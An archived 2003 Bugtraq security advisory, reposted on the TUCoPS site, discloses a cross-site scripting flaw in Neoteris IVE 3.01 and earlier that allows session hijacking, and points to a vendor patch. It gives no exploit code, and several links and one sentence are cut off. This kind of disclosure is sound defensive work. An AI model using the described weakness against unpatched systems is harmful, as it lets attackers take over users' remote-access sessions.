Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Network Appliances :: bt168.txt

XSS In Neoteris IVE Allows Session Hijacking

Note to Moderator:

In light of some recent cross-site scripting posts allowed through to Bugtraq recently, grateful
if you would pass this one onto the list....thanks.  -d.

Security Advisory>=- 

Advisory Title: Cross-Site Scripting (XSS) in Neoteris IVE Allows Session Hijacking 
Release Date: May 13, 2003 
Product: Neoteris Instant Virtual Extranet (IVE), Versions 3.01 and Prior 
Overall Risk: Medium 
CVE Candidate: CAN-2003-0217 


Neoteris Instant Virtual Extranet (IVE) is an appliance-based remote access solution that is 
accessed via a standard web browser. The Neoteris IVE is one of the more well known "clientless 
VPN" solutions, and in fact boasts an impressive, growing list of customers (see for more information). Once authenticated to the remote network via the 
IVE, a user can theoretically access all internal resources, provided the Neoteris box is 
configured accordingly. 

Quoting from the company website, "The Neoteris IVE has always provided a means to remote access 
with a dramatically lower Total Cost of Ownership vs. traditional methods like VPN or dial. The 
IVE also enhances security, by eliminating open-ended, network layer connections. The security of 
the IVE has been verified by a several well-known independent security authorities." 


A cross-site scripting (XSS) vulnerability exists in Neoteris IVE v3.01 and prior. An argument 
passed to a CGI script does not properly validate input. It has been confirmed that exploiting 
this vulnerability can lead to a legitimate user's session being hijacked, bypassing any 


I would like to thank Neoteris for their cooperation in developing a remediation for this 
vulnerability. A patch has been released for v3.01 and prior. In addition, this issue has been 
fixed in v3.1. Patch and new version release information is available for customers at 

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2003-0217 to this

issue. This is a candidate for inclusion in the CVE list (, which 
standardizes names for security problems. 

Special thanks to DW (shall I say greetz?) for his invaluable help with these issues. 

- Dave Palumbo 

Do you Yahoo!?
The New Yahoo! Search - Faster. Easier. Bingo.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH